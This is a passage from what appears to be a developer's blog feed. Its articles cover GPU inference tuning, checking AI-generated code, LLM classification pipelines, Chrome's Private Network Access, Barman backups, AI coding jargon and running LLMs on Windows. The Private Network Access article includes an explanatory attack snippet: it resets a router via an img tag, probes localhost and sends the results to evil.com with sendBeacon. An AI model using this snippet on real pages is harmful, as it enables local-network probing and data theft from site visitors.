    int   capacity;     // max_seq_len
    int   length;       // current logical length
} kv_cache_t;

static inline void kv_append(kv_cache_t* c,
                             const half* k_new,
                             const half* v_new,
                             int layer, int n_kv, int head_dim) {
    // Just write to the next slot; no allocation.
    size_t off = ((size_t)layer * c->capacity + c->length) * n_kv * head_dim;
    memcpy(c->k + off, k_new, n_kv * head_dim * sizeof(half));
    memcpy(c->v + off, v_new, n_kv * head_dim * sizeof(half));
}

If you want to support eviction or sliding windows later, add it as a logical layer on top. Keep the hot path branch-free.

Step 3: pick the right quantization for your hardware

Not all 4-bit schemes are equal on Metal. Group-wise quantization with a small group size (32 or 64) usually unpacks cleanly in SIMD lanes and plays nicely with the threadgroup memory you have. Block-wise schemes with larger groups save more on the scale-table side but can stall on misaligned reads.

My rough rule of thumb after migrating a few projects:

Q4 with group size 32: best balance for M-series; fast unpack, good quality.
Q5/Q6: noticeable quality bump, but you're trading away bandwidth — only worth it if you're already CPU-bound on dispatch.
Q8: simple, accurate, but uses 2x the bandwidth of Q4 for marginal quality. Use it for debugging quantization bugs, not production.

This is the kind of tradeoff a focused engine bakes in; a generic one usually exposes all of them and lets you pick the wrong one.

Prevention: profile before you optimize

Before you touch a single kernel, open Instruments with Metal System Trace and look at the timeline. You're looking for:

Long gaps between command buffer commits (CPU bottleneck — your encoding loop is too chatty).
Many tiny encoders inside one buffer (kernel fusion opportunity).
High occupancy but low achieved bandwidth (unaligned reads or scalar paths in your kernels).
Memory traffic that exceeds your model size per token (you're materializing dequantized weights — fix that first).

Apple's Metal Performance HUD and the official Metal Shading Language spec are your friends here. So is reading focused, single-model engines like ds4 — they tend to make the design choices explicit instead of hiding them behind abstraction.

The takeaway

Local inference on Apple Silicon isn't slow because the hardware is bad. It's slow when generic frameworks impose generic abstractions on a workload that punishes them. Fuse your kernels, keep weights packed, preallocate your KV cache, pick a quantization that maps well to SIMD, and profile before you guess. You'll get most of the way to what a hand-tuned engine achieves — and you'll understand your stack a lot better when something inevitably regresses.

Why AI-Generated Code Makes You Slower (And How to Fix Your Workflow)

Alan West — Sun, 10 May 2026 16:25:10 GMT

You've probably felt this. The first week you wired an AI assistant into your editor, you shipped twice as much. By month three, you were back to your old pace — except now you were debugging weirder bugs.

I've been using AI assistants in my daily workflow for about two years across four projects. The pattern keeps showing up: the productivity gains are real but front-loaded, and they erode unless you change how you work. Most of that erosion comes from one specific, fixable problem.

The Problem: Plausible Code That Doesn't Actually Work

The bug I see most often isn't an obvious syntax error. It's when generated code calls a function, method, or config option that looks exactly like something the library would have — but doesn't.

Last month I was building a CSV import feature and the assistant happily produced this:

import pandas as pd

# Read CSV with progress reporting — looks reasonable, right?
df = pd.read_csv(
    "users.csv",
    on_progress=lambda pct: print(f"Loading: {pct}%"),  # this kwarg does not exist
    chunksize=10_000,
)

on_progress is not a real parameter on pd.read_csv. The code was syntactically valid Python, my linter didn't complain, and the failure mode was... silent. The kwarg got swallowed and the import ran without any progress reporting. I only noticed because a user pinged me saying the loading bar wasn't moving.

This is the core issue. AI-generated code is plausible in a specific, dangerous way: it pattern-matches the shape of real APIs, which is exactly what makes it hard to spot in review.

Root Cause: How Hallucinations Slip Through

Three things conspire here:

Pattern-matching beats correctness. The model has seen thousands of pd.read_csv calls. It has also seen progress callbacks on other I/O functions. Stitching them together produces code that looks right without being right.
Type checkers often can't save you. Many libraries use **kwargs, dynamic dispatch, or duck typing. Static analysis won't flag a non-existent keyword argument that flows through **kwargs.
Reviewer fatigue. When the surrounding code is correct and the function name is real, your eyes glide over the made-up parameter. After 200 lines of mostly-good output, you stop reading carefully.

The deeper issue is a workflow one. If you're prompting for a feature and pasting the result, you've outsourced generation but kept full responsibility for verification — and verification is harder on code you didn't write, because you don't have the mental model the author would have.

The Fix: Force Verification Into the Loop

Here's the workflow I switched to after enough of these bites. The core idea: don't accept code unless something other than your eyes has touched it.

Step 1: Generate the test first

Before generating the implementation, write (or generate) a test that exercises the specific behavior you want. This pins the behavior to something runnable.

# tests/test_import.py
from myapp.importer import load_users

def test_load_users_reports_progress():
    progress_log = []

    # The whole point of the feature: progress callbacks fire
    result = load_users(
        "tests/fixtures/users.csv",
        on_progress=lambda pct: progress_log.append(pct),
    )

    assert len(result) > 0
    assert progress_log, "expected at least one progress update"
    assert progress_log[-1] == 100

If the implementation hallucinates an API, the test fails immediately with a real error message — usually TypeError: unexpected keyword argument. Way cheaper than debugging in production.

Step 2: Run code, don't just read it

Add a pre-commit hook that blocks commits when tests fail. Yes, this is obvious. Yes, most teams I've worked with don't actually enforce it.

# .pre-commit-config.yaml
repos:
  - repo: local
    hooks:
      - id: pytest-fast
        name: pytest (fast suite)
        entry: pytest -x -m "not slow"  # -x: stop on first failure
        language: system
        pass_filenames: false
        always_run: true

The point isn't catching every bug. It's catching the plausible-but-wrong ones the moment they hit your branch, before they pile up into a multi-hour debugging session two weeks later.

Step 3: Pin the dependency surface

A surprising amount of hallucination happens because the model assumes a different version of a library than you have installed. Lock your versions and tell the assistant which version you're on:

# pyproject.toml
[project]
dependencies = [
    "pandas==2.2.3",    # exact pin, not >=
    "pydantic==2.9.2",
]

When you prompt, include the version. "Using pandas 2.2.3, write a CSV importer with progress reporting" gets you closer to reality than the same prompt without the version, because the model will at least try to constrain its API recall.

Step 4: Prefer narrow prompts over broad ones

Long, multi-feature prompts produce code where errors compound. I get better results asking for one function at a time, with clear inputs and outputs:

Function signature:
    def parse_user_row(row: dict) -> User: ...

Requirements:
- Strip whitespace from email
- Reject rows where email is missing or invalid
- Return User(email=..., name=..., created_at=...)
- Raise InvalidRowError on bad data, do not log

Use only the standard library and pydantic 2.9.

Narrow scope, explicit constraints, named version. My hallucination rate drops noticeably with this format.

Prevention: Build Habits, Not Heroics

A few things I now do reflexively:

Read the imports first. If the generated code imports something you didn't ask for, that's a yellow flag. Verify the import path exists in your installed version before reading further.
Distrust convenience parameters. When a function call has a kwarg that feels suspiciously just right for your problem, look it up in the docs. That's the highest-probability hallucination spot.
Treat "looks correct" as a smell. If you read 30 lines of generated code and have zero questions, you didn't read carefully. There should always be at least one thing to verify.
Keep your test runtime fast. If your full suite takes eight minutes, you'll skip running it. Sub-30-second feedback loops are what actually keep this workflow honest.

So, More Work or Less?

After two years, my honest answer is: roughly the same amount of work, but distributed differently. Less typing, more reading. Less greenfield design, more verification. The people I see losing time to AI tools are the ones who didn't shift the verification load anywhere — they just trusted the output and inherited a slower debugging tail.

The tooling won't fix this for you. The workflow will.

Why Your LLM Classification Pipeline Fails on Edge Cases (and How to Fix It)

Alan West — Mon, 04 May 2026 00:41:21 GMT

A Harvard study recently made waves: OpenAI's o1 model reportedly diagnosed 67% of emergency room patients correctly, compared to 50-55% accuracy from triage doctors. Whether or not that number holds up under scrutiny, it highlights something developers building AI classification systems already know — LLMs can be surprisingly good at pattern matching across messy, unstructured input.

But here's the part nobody's tweeting about: getting an LLM to perform well in a research setting and getting it to perform reliably in a production pipeline are two completely different problems.

I've spent the last year building classification systems that use LLMs for intake processing, risk scoring, and routing decisions. The accuracy numbers looked great in testing. Then production traffic hit, and things got weird fast.

Let me walk you through the failure modes I encountered and how I fixed each one.

The Core Problem: Inconsistent Output on Ambiguous Input

Here's the scenario. You've got an LLM classifying incoming data into categories — could be support tickets, insurance claims, medical symptoms, whatever. Your eval set shows 85% accuracy. You ship it.

Within a week, you notice:

The same input produces different classifications on retry
Edge cases get confidently wrong answers (no hedging, no uncertainty)
The model hallucinates categories that don't exist in your schema

Sound familiar? The root cause is almost always the same: you're treating a probabilistic text generator like a deterministic function.

Step 1: Lock Down Your Output Schema

The first fix is embarrassingly simple. Stop accepting free-text classification output.

import json
from pydantic import BaseModel, Field
from enum import Enum

class TriageCategory(str, Enum):
    CRITICAL = "critical"
    URGENT = "urgent"
    STANDARD = "standard"
    LOW = "low"

class ClassificationResult(BaseModel):
    category: TriageCategory
    confidence: float = Field(ge=0.0, le=1.0)
    reasoning: str = Field(max_length=500)
    # Forces the model to flag when it's unsure
    ambiguous: bool = False
    differential: list[TriageCategory] = []  # other possible categories

def validate_classification(raw_output: str) -> ClassificationResult:
    try:
        data = json.loads(raw_output)
        return ClassificationResult(**data)
    except (json.JSONDecodeError, ValueError) as e:
        # Don't silently fall back — route to human review
        raise ClassificationError(f"Model output failed validation: {e}")

The differential field is the key insight I stole from actual medical practice. When doctors aren't sure, they don't just pick one answer — they list the possibilities. Your model should do the same.

If you're using an API that supports structured outputs or function calling, use that instead of parsing raw text. It eliminates an entire class of formatting errors.

Step 2: Calibrate Confidence Scores (They're Lying to You)

Here's something that bit me hard. When you ask an LLM to self-report confidence, those numbers are essentially made up. A model that says it's 95% confident is not actually right 95% of the time.

import numpy as np
from collections import defaultdict

class ConfidenceCalibrator:
    """Post-hoc calibration using historical predictions vs. outcomes."""

    def __init__(self, n_bins: int = 10):
        self.n_bins = n_bins
        self.bin_boundaries = np.linspace(0, 1, n_bins + 1)
        self.calibration_map: dict[int, float] = {}

    def fit(self, predicted_confidences: list[float], actual_correct: list[bool]):
        """Build calibration curve from labeled evaluation data."""
        bins = defaultdict(list)

        for conf, correct in zip(predicted_confidences, actual_correct):
            bin_idx = int(np.digitize(conf, self.bin_boundaries)) - 1
            bin_idx = min(bin_idx, self.n_bins - 1)
            bins[bin_idx].append(correct)

        for bin_idx, outcomes in bins.items():
            # Actual accuracy for this confidence range
            self.calibration_map[bin_idx] = sum(outcomes) / len(outcomes)

    def calibrate(self, raw_confidence: float) -> float:
        """Map model's claimed confidence to actual observed accuracy."""
        bin_idx = int(np.digitize(raw_confidence, self.bin_boundaries)) - 1
        bin_idx = min(bin_idx, self.n_bins - 1)
        return self.calibration_map.get(bin_idx, raw_confidence)

In my experience, LLMs are consistently overconfident in the 0.7-0.9 range. After calibration, a lot of those "85% confident" predictions turned out to be correct about 60% of the time. That's a massive difference when you're routing decisions based on those numbers.

Step 3: Build a Human-in-the-Loop Escalation Path

This is where most teams cut corners, and it's where the Harvard study comparison gets interesting. The study compared AI-only vs. doctor-only. But in practice, the winning architecture is neither — it's AI + human with clear escalation rules.

class EscalationRouter:
    def __init__(self, calibrator: ConfidenceCalibrator, 
                 auto_threshold: float = 0.85,
                 reject_threshold: float = 0.5):
        self.calibrator = calibrator
        self.auto_threshold = auto_threshold
        self.reject_threshold = reject_threshold

    def route(self, result: ClassificationResult) -> str:
        calibrated = self.calibrator.calibrate(result.confidence)

        # High confidence + no ambiguity = auto-process
        if calibrated >= self.auto_threshold and not result.ambiguous:
            return "auto_accept"

        # Model flagged ambiguity or differential has close alternatives
        if result.ambiguous or len(result.differential) > 1:
            return "human_review_priority"

        # Low confidence = don't even try
        if calibrated < self.reject_threshold:
            return "human_review_required"

        # Middle ground: accept but flag for async audit
        return "auto_accept_with_audit"

The auto_accept_with_audit path is crucial. It lets you process the majority of clear-cut cases automatically while building a feedback dataset from the audited ones. After a few weeks, you've got labeled data to retrain your calibration curve.

Step 4: Use Eval-Driven Development, Not Vibes

The reason that Harvard study is useful isn't the headline number — it's that they had a clear evaluation methodology. Your classification system needs the same thing.

def run_eval_suite(classify_fn, test_cases: list[dict]) -> dict:
    results = {
        "total": len(test_cases),
        "correct": 0,
        "incorrect_but_flagged": 0,  # wrong, but model said ambiguous
        "incorrect_confident": 0,    # wrong AND confident — the scary ones
        "consistency": []             # same input, multiple runs
    }

    for case in test_cases:
        # Run each case 3 times to check consistency
        outputs = [classify_fn(case["input"]) for _ in range(3)]
        categories = [o.category for o in outputs]

        results["consistency"].append(len(set(categories)) == 1)

        # Use majority vote for accuracy check
        from collections import Counter
        majority = Counter(categories).most_common(1)[0][0]

        if majority == case["expected"]:
            results["correct"] += 1
        elif any(o.ambiguous for o in outputs):
            results["incorrect_but_flagged"] += 1
        else:
            results["incorrect_confident"] += 1

    results["consistency_rate"] = sum(results["consistency"]) / len(results["consistency"])
    return results

The metric I care about most isn't overall accuracy — it's incorrect_confident. That's the failure mode that causes real damage. A system that's wrong 20% of the time but flags uncertainty is infinitely more useful than one that's wrong 15% of the time but never tells you.

Prevention: The Production Checklist

Before you ship any LLM classification pipeline to production:

Structured output validation — never trust raw text parsing for critical paths
Calibrated confidence — run at least 200 labeled examples through calibration before going live
Escalation routing — define explicit thresholds for auto-accept, audit, and human-review
Consistency testing — if the same input gives different outputs on retry, your temperature is too high or your prompt is ambiguous
Eval suite in CI — run your test cases on every prompt change, every model version bump
Monitoring in production — track confidence distribution drift over time. If your model suddenly gets more confident or less confident across the board, something changed

The Bigger Picture

The headline "AI beats doctors" is reductive. What the research actually suggests is that LLMs are good at synthesizing patterns across large amounts of unstructured text — which is literally what they were built to do.

The developer takeaway isn't "replace humans with LLMs." It's that a well-built classification pipeline with proper calibration, structured outputs, and human escalation can outperform either humans or AI working alone.

Build the pipeline right, measure it honestly, and don't trust the confidence scores until you've calibrated them. That's it. That's the whole thing.

Why Every Website Wants to Access Your Local Network (And What to Do About It)

Alan West — Sun, 03 May 2026 20:42:28 GMT

If you've been browsing the web recently, you've probably noticed a new kind of permission prompt popping up: "This site wants to access devices on your local network." It showed up for me on a random dashboard I was building, and my first thought was — wait, I wrote this app, why is the browser asking me this?

Turns out, this is Chrome's rollout of Private Network Access (PNA), and it's changing how web apps interact with local resources. If you're a developer who builds anything that talks to localhost, IoT devices, printers, or internal APIs, you need to understand this.

What's Actually Happening

Private Network Access is a security specification (formerly known as CORS-RFC1918) that prevents public websites from silently making requests to resources on your private or local network. The browser now classifies all network destinations into three buckets:

Public — any globally routable IP address
Private — RFC 1918 ranges like 10.x.x.x, 172.16.x.x–172.31.x.x, 192.168.x.x
Local — localhost / 127.0.0.1 / ::1

The rule is simple: requests from a less private context to a more private context get blocked unless explicitly allowed. A page served from a public server can't just silently hit 192.168.1.1 anymore.

Why This Exists (And Why It's a Good Thing)

For years, attackers have exploited the trust relationship between your browser and your local network. A malicious website could fire off requests to your router's admin panel, poke at internal company APIs, or scan for IoT devices — all without you knowing.

The classic attack looks something like this:


<img src="http://192.168.1.1/admin/factory_reset" />


<script>
  // Scan common local ports to fingerprint internal services
  fetch('http://localhost:8080/api/health')
    .then(r => r.json())
    .then(data => {
      // Exfiltrate info about what's running locally
      navigator.sendBeacon('https://evil.com/collect', JSON.stringify(data));
    })
    .catch(() => {}); // silently fail, try next port
script>

DNS rebinding attacks are even nastier — an attacker's domain resolves to their server initially, then switches to 127.0.0.1 after the page loads, bypassing same-origin policy. PNA shuts this down at the network level.

How It Works Under the Hood

When your page tries to make a request from a public context to a private/local address, Chrome now sends a CORS preflight with a special header:

OPTIONS /api/data HTTP/1.1
Host: 192.168.1.50:3000
Origin: https://myapp.example.com
Access-Control-Request-Method: GET
Access-Control-Request-Private-Network: true

Your local server needs to respond with:

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://myapp.example.com
Access-Control-Allow-Private-Network: true

If the server doesn't include Access-Control-Allow-Private-Network: true in the preflight response, the browser blocks the actual request. No negotiation, no fallback.

Fixing It for Your Dev Environment

This is where most developers first run into PNA — your frontend is served from a deployed domain (or even a local dev server on one port) and it's trying to hit an API on another local port. Here's how to handle it.

Option 1: Add the PNA Headers to Your Server

If you control the local server, add the proper CORS preflight handling. Here's an example with Express:

const express = require('express');
const app = express();

app.use((req, res, next) => {
  // Handle the PNA preflight
  if (req.method === 'OPTIONS') {
    res.setHeader('Access-Control-Allow-Origin', req.headers.origin || '*');
    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');
    res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');

    // This is the key header for Private Network Access
    res.setHeader('Access-Control-Allow-Private-Network', 'true');

    return res.status(200).end();
  }

  res.setHeader('Access-Control-Allow-Origin', req.headers.origin || '*');
  next();
});

app.get('/api/data', (req, res) => {
  res.json({ status: 'ok' });
});

app.listen(3000);

Option 2: Use a Reverse Proxy

If you don't control the local service (like a printer interface or an IoT device), you can proxy through your own backend. This keeps everything within the same origin and avoids the PNA check entirely.

# nginx.conf — proxy local device through your server
server {
    listen 443 ssl;
    server_name myapp.example.com;

    location /api/local-device/ {
        # Forward to the device on the local network
        proxy_pass http://192.168.1.50:8080/;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Now your frontend hits https://myapp.example.com/api/local-device/status and the proxy handles the local network hop server-side. No browser permission prompt, no PNA preflight.

Option 3: Serve Everything from the Same Private Context

If both your frontend and API are on the local network, serve them from the same origin. Private-to-private requests within the same address space don't trigger PNA checks.

# Serve your frontend from the same local server
# Instead of: frontend on myapp.com hitting localhost:3000
# Do: frontend AND api both on localhost:3000
npx serve ./dist -l 3000

Common Gotchas

Mixed content matters. If your page is served over HTTPS (public), it's extra restricted. A secure public page trying to hit an insecure local endpoint (http://localhost:...) gets blocked even harder. The browser really does not want that combination.

WebSockets are affected too. PNA applies to WebSocket connections. If your app opens a WebSocket to a local device, the same preflight rules apply — though the handshake mechanism differs slightly from standard CORS preflights.

Chrome flags for testing. During development, you can temporarily disable this check to unblock yourself:

chrome://flags/#block-insecure-private-network-requests

Set it to "Disabled" and restart. But don't ship instructions telling users to do this — that defeats the entire security model.

What About Other Browsers?

Chrome is leading this rollout, but the spec is a W3C community effort under the WICG. Firefox and Safari have shown interest but haven't fully implemented the permission prompt yet as of early 2025. Expect this to become standard across all browsers eventually.

Prevention: Design for PNA from the Start

If you're building anything that needs local network access:

Architect with a proxy layer. Don't assume the browser can directly reach local resources from a public origin. Route through your backend.
Add PNA headers to every local service you build. Make Access-Control-Allow-Private-Network: true part of your CORS middleware from day one.
Use HTTPS everywhere, even locally. Tools like mkcert make it easy to get trusted local certificates.
Test with PNA enabled. Don't rely on Chrome flags being off. Test the real user experience.

PNA might feel annoying when you first hit it, but it's closing a real class of vulnerabilities that's been open for decades. A few headers and some thoughtful architecture is a small price for keeping your users' local networks safe from drive-by attacks.

Why Your Barman Backups Keep Failing (And How to Actually Fix It)

Alan West — Sun, 03 May 2026 18:55:06 GMT

So you finally set up Barman to handle your PostgreSQL backups. You followed the docs, configured your server, ran barman check and... a wall of FAILED messages stares back at you. Cool. Very reassuring for your disaster recovery strategy.

I've been through this exact pain on multiple projects. Barman is genuinely excellent backup tooling for PostgreSQL, but the initial setup has several moving parts that all need to work together. Let me walk you through the most common failures and how to systematically fix each one.

The Symptom: `barman check` Looks Like a Crime Scene

Here's what a broken Barman setup typically looks like:

$ barman check mydb
Server mydb:
    PostgreSQL: OK
    is_superuser: OK
    PostgreSQL streaming: FAILED
    WAL archive: FAILED (no WAL file archived yet)
    replication slot: FAILED (slot not found)
    SSH: FAILED
    backup maximum age: FAILED
    compression settings: OK

Four failures. Each one blocks the next. The trick is knowing the correct order to fix them, because they're actually a dependency chain.

Root Cause 1: SSH Isn't Configured Both Ways

This catches everyone. Barman needs passwordless SSH in both directions — from the barman OS user to the postgres OS user on the database host, AND from postgres back to barman. Most people only set up one direction.

# On the Barman host, as the barman user
ssh-keygen -t ed25519 -N '' -f ~/.ssh/id_ed25519
ssh-copy-id postgres@your-db-host

# On the DB host, as the postgres user
ssh-keygen -t ed25519 -N '' -f ~/.ssh/id_ed25519
ssh-copy-id barman@your-barman-host

Verify both directions actually work without a password prompt:

# From barman host
sudo -u barman ssh postgres@your-db-host "echo ok"

# From db host
sudo -u postgres ssh barman@your-barman-host "echo ok"

If either one asks for a password, your backups won't work. Period. Check ~/.ssh/authorized_keys permissions — SSH is picky about this. The .ssh directory needs 700 and the authorized_keys file needs 600.

Root Cause 2: WAL Archiving Isn't Actually Enabled

Barman relies on receiving WAL (Write-Ahead Log) files from PostgreSQL to enable point-in-time recovery. There are two ways to get WAL to Barman, and mixing them up is a classic source of confusion.

Method 1: archive_command (push model)

PostgreSQL pushes WAL files to Barman via SSH. You need to configure this in postgresql.conf:

# postgresql.conf on the database server
archive_mode = on
archive_command = 'barman-archive-wal mydb %p'

# Requires barman-cli package installed on the DB host

The gotcha here: archive_mode requires a full server restart, not just a reload. I've lost an embarrassing amount of time wondering why archive_command wasn't firing, only to realize archive_mode was still off because I only did pg_ctl reload.

Method 2: Streaming via pg_receivewal (pull model)

Barman pulls WAL using PostgreSQL's streaming replication protocol. This is more reliable and my preferred approach. In your Barman server config:

# /etc/barman.d/mydb.conf
[mydb]
description = "Production DB"
conninfo = host=your-db-host user=barman dbname=postgres
streaming_conninfo = host=your-db-host user=streaming_barman
backup_method = postgres
streaming_archiver = on
replication_slot_name = barman

You can actually run both methods simultaneously for redundancy, which is what I do in production. Belt and suspenders.

Root Cause 3: The Replication Slot Doesn't Exist Yet

If you set replication_slot_name in the config (and you should, to prevent WAL files from being recycled before Barman grabs them), you need to explicitly create it:

# Create the replication slot
barman receive-wal --create-slot mydb

# Then start the WAL receiver
barman receive-wal mydb

A warning here: if a replication slot exists but Barman isn't consuming from it, PostgreSQL will keep every WAL file forever. I've seen this fill up a production disk at 3 AM. Not fun. Monitor your replication slot lag.

You can check the slot status from PostgreSQL directly:

SELECT slot_name, active, restart_lsn,
       pg_wal_lsn_diff(pg_current_wal_lsn(), restart_lsn) AS lag_bytes
FROM pg_replication_slots
WHERE slot_name = 'barman';

Root Cause 4: The Cron Job Is Missing

This is the sneaky one. Barman doesn't run as a daemon. It relies on barman cron being executed regularly — typically every minute — to perform WAL archiving, manage pg_receivewal processes, and enforce retention policies.

# Add to the barman user's crontab
sudo -u barman crontab -e

# Add this line:
* * * * * /usr/bin/barman cron

Without this, pg_receivewal won't start, WAL files won't be processed from the incoming directory, and old backups will pile up ignoring your retention policy. I've audited setups where everything was configured perfectly but nobody added the cron entry. barman check just silently showed failures.

The Fix: A Systematic Checklist

Here's the order I follow every time I set up Barman on a new server:

Install Barman on the backup host and barman-cli on the database host
Set up bidirectional SSH between the barman and postgres users
Configure the PostgreSQL side — archive_mode, WAL level, connection permissions in pg_hba.conf
Create the Barman server config in /etc/barman.d/
Create the replication slot: barman receive-wal --create-slot mydb
Set up the cron job for barman cron
Force a WAL switch to verify the pipeline: barman switch-wal mydb
Run barman check — everything should be green now
Take your first backup: barman backup mydb

Prevention: Don't Wait for Disaster

Once everything is green, set up monitoring. A few things to watch:

Run barman check in your monitoring system — it returns non-zero exit codes on failure, so it plugs into Nagios, Prometheus exporters, or a simple cron-based alerting script
Set a retention policy so old backups get cleaned up automatically:

# In your server config
retention_policy = RECOVERY WINDOW OF 7 DAYS

Test recovery regularly. A backup you've never restored is a backup you don't have. Schedule a monthly test restore to a scratch server:

# Restore latest backup to a temporary location
barman recover mydb latest /tmp/pg_restore_test \
  --remote-ssh-command "ssh postgres@test-host"

Monitor replication slot lag to catch the disk-filling scenario I mentioned earlier

Wrapping Up

Barman's initial setup friction is real, but it's a one-time cost. Once it's running, it's genuinely solid tooling — I've relied on it across multiple production Postgres deployments and it's saved me more than once during actual incidents.

The key insight is that most Barman failures aren't Barman problems. They're SSH permission issues, PostgreSQL configuration oversights, or missing cron entries. Fix the foundation and Barman just works.

If barman check is still showing failures after going through all of this, the official Barman documentation is thorough and well-organized. The barman diagnose command is also your friend — it dumps the full configuration and system state into a format you can paste into a GitHub issue if you're truly stuck.

AI Coding Has Its Own Language Now — Here's How to Decode It

Alan West — Sun, 03 May 2026 17:36:57 GMT

If you've tried to follow any AI coding discussion in the last six months, you've probably felt like everyone suddenly started speaking a dialect you never signed up to learn. "Vibe coding." "Agentic workflows." "Context windows." "Prompt engineering." The jargon is multiplying faster than JavaScript frameworks, and that's saying something.

Matt Pocock — who you might know from his TypeScript education work at Total TypeScript — apparently felt the same frustration. He's put together a dictionary-of-ai-coding repository on GitHub that attempts to explain AI coding jargon in plain English. It's been trending, and honestly, it's the kind of resource I wish existed six months ago.

Why This Matters More Than You Think

Here's the thing: the AI coding space is moving so fast that terms get invented, redefined, and sometimes abandoned within weeks. I've been in meetings where three developers used the same term to mean three different things. That's not a terminology problem — that's a communication breakdown that leads to bad architecture decisions.

Consider how many developers are now interacting with AI tools daily. Whether you're using Cursor, GitHub Copilot, Claude Code, or any other AI-assisted coding tool, you're swimming in terminology that didn't exist two years ago. Having a shared vocabulary isn't just nice — it's necessary.

Some Terms Worth Actually Understanding

Let me walk through a few AI coding terms that I think every developer should internalize, not just recognize.

Context Window

This is the total amount of text (measured in tokens) that an AI model can "see" at once. Think of it like the model's working memory.

# A simplified mental model of context windows
context_window = {
    "system_prompt": 500,      # instructions to the model
    "conversation_history": 3000,  # prior messages
    "current_code": 2000,      # the file you're working on
    "available_for_response": 2500  # what's left for the AI to generate
}
# When you hit the limit, older context gets dropped
# This is why AI "forgets" things in long conversations

Why does this matter practically? Because when your AI coding assistant starts giving weird suggestions halfway through a session, it's probably not broken — it's lost context. Understanding this changes how you structure your interactions.

Agentic Coding

This is where the AI doesn't just suggest code — it takes actions. It reads files, runs commands, creates branches, executes tests. The shift from "autocomplete on steroids" to "junior developer who never sleeps" is the agentic shift.

// Non-agentic: AI suggests code inline
// You: "write a function to parse CSV"
// AI: here's a function (you copy-paste it)

// Agentic: AI takes autonomous actions
// You: "add CSV parsing to the data pipeline"
// AI: 
//   1. reads your existing pipeline code
//   2. creates a new parser module
//   3. writes tests
//   4. runs the tests
//   5. fixes failures
//   6. commits the changes

I've been using agentic coding tools more heavily over the past few months, and the mental model shift is real. You stop thinking about writing code and start thinking about reviewing code. That's a fundamentally different skill.

Vibe Coding

Coined by Andrej Karpathy, this one describes the practice of building software by describing what you want in natural language and letting AI handle the implementation details. You're coding by vibes, not by syntax.

It sounds wild, but I've seen people build functional prototypes this way in hours. The catch? The code quality is often... questionable. Vibe coding is great for prototyping and terrible for production systems that need to be maintained.

Prompt Engineering vs. Prompt Design

I've noticed people using these interchangeably, but they're subtly different. Prompt engineering is the technical practice of crafting inputs to get specific outputs from a model. Prompt design is broader — it's about designing the entire interaction pattern, including system prompts, context management, and output formatting.

# Prompt engineering (tactical)
prompt: "Convert this function to use async/await. 
        Keep error handling. Return the same types."

# Prompt design (strategic)
system: "You are a code modernization assistant.
        Always preserve existing tests.
        Explain breaking changes before making them."
context:
  - existing_code: "./src/legacy/"
  - test_suite: "./tests/"
  - style_guide: "./.eslintrc"
output_format: "diff with inline comments"

The Meta-Problem: Jargon as Gatekeeping

Here's where I get a bit opinionated. The rapid proliferation of AI coding jargon has a real gatekeeping effect. When senior engineers casually throw around terms like "RAG pipeline," "few-shot prompting," and "temperature tuning" in standups, junior developers nod along while internally panicking.

That's why open, community-maintained resources like Matt Pocock's dictionary matter. They lower the barrier to entry. You don't need to take a course or read a paper — you just need a plain-English explanation you can reference in two minutes.

How to Actually Keep Up

A few practical strategies that have worked for me:

Learn terms in context, not in isolation. Don't memorize definitions. Use an AI coding tool, hit a concept you don't understand, look it up, then keep going. The hands-on context makes it stick.
Build a personal glossary. I keep a markdown file in my notes app. When I encounter a new term, I write down what I think it means, then verify. The act of writing it down is what cements it.
Follow the tool changelogs. Cursor, Copilot, Claude Code — they all publish updates. Reading changelogs teaches you terminology naturally because the terms are attached to real features.
Track your own tools. On a related note, privacy-focused analytics tools like Umami or Plausible can help you understand how developers interact with your projects and docs without invasive tracking — useful if you're building developer tools yourself.

The Dictionary Approach Is Smart

What I appreciate about the dictionary-of-ai-coding repo is the format. It's not a tutorial. It's not a course. It's a reference. When you're in the middle of reading a blog post or sitting in a meeting and someone drops a term you don't know, you want a 30-second answer, not a 30-minute video.

The repo is open source, which means the community can contribute definitions and keep them updated as the terminology evolves. That's important because — and I cannot stress this enough — the definitions will change. "Agent" meant something different in AI circles twelve months ago than it does today.

My Advice: Don't Panic, But Don't Ignore It Either

If you're feeling overwhelmed by AI coding terminology, you're in good company. The field is genuinely moving fast, and nobody has it all figured out. But here's the thing — you don't need to know every term. You need to know the ones that affect your daily work.

Start with the basics: context windows, tokens, prompts, agents. Bookmark Matt's dictionary for when you hit something unfamiliar. And most importantly, don't let jargon stop you from actually using these tools.

The developers who'll thrive aren't the ones who can define every term perfectly. They're the ones who can ship code — with or without AI assistance — and communicate clearly about what they're doing. A shared vocabulary just makes that communication easier.

Running LLMs on Windows: Native vLLM vs WSL vs llama.cpp Compared

Alan West — Sun, 03 May 2026 16:23:17 GMT

The Windows local LLM story just got interesting. Someone recently demonstrated Qwen3's 27B model running at 72 tokens per second on an RTX 3090 — natively on Windows. No WSL. No Docker. Just a portable vLLM launcher.

If you've been running local models on Windows, you know the pain. Let me break down how the landscape has shifted and help you pick the right inference stack.

Why This Comparison Matters Now

For the longest time, running vLLM on Windows meant one of two things: spin up WSL2 or wrestle with Docker Desktop. Both add overhead, complexity, and weird networking quirks. Native Windows support changes the calculus entirely.

I've been running local models for inference on my dev machine for months — mostly through llama.cpp and Ollama. When I saw native vLLM hitting 72 tok/s on a 3090 with a 27B parameter model, I had to dig in.

The Contenders

Here's what we're comparing:

Native vLLM on Windows — the new kid, portable launcher approach
vLLM via WSL2 — the established "proper" way
llama.cpp (direct) — the GGUF Swiss army knife
Ollama — the "just works" option

Setup Complexity

Native vLLM (Windows)

From what's been shared, the portable installer handles CUDA dependencies and sets up vLLM without requiring a Linux subsystem:

# Reportedly as simple as:
./vllm-launcher.exe --model Qwen/Qwen3-27B --gpu-memory-utilization 0.95

# The launcher handles:
# - CUDA toolkit detection/bundling
# - Python environment isolation
# - Model downloading and caching

The "portable" aspect is key — no global Python installation conflicts, no PATH pollution.

vLLM via WSL2

# First, ensure WSL2 is set up with CUDA passthrough
wsl --install -d Ubuntu-22.04

# Inside WSL:
pip install vllm
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen3-27B \
  --tensor-parallel-size 1 \
  --gpu-memory-utilization 0.95

Works well, but you're maintaining a full Linux userspace. GPU passthrough occasionally breaks after Windows updates. Ask me how I know.

llama.cpp

# Download a GGUF quantized model
# Run the server with CUDA acceleration
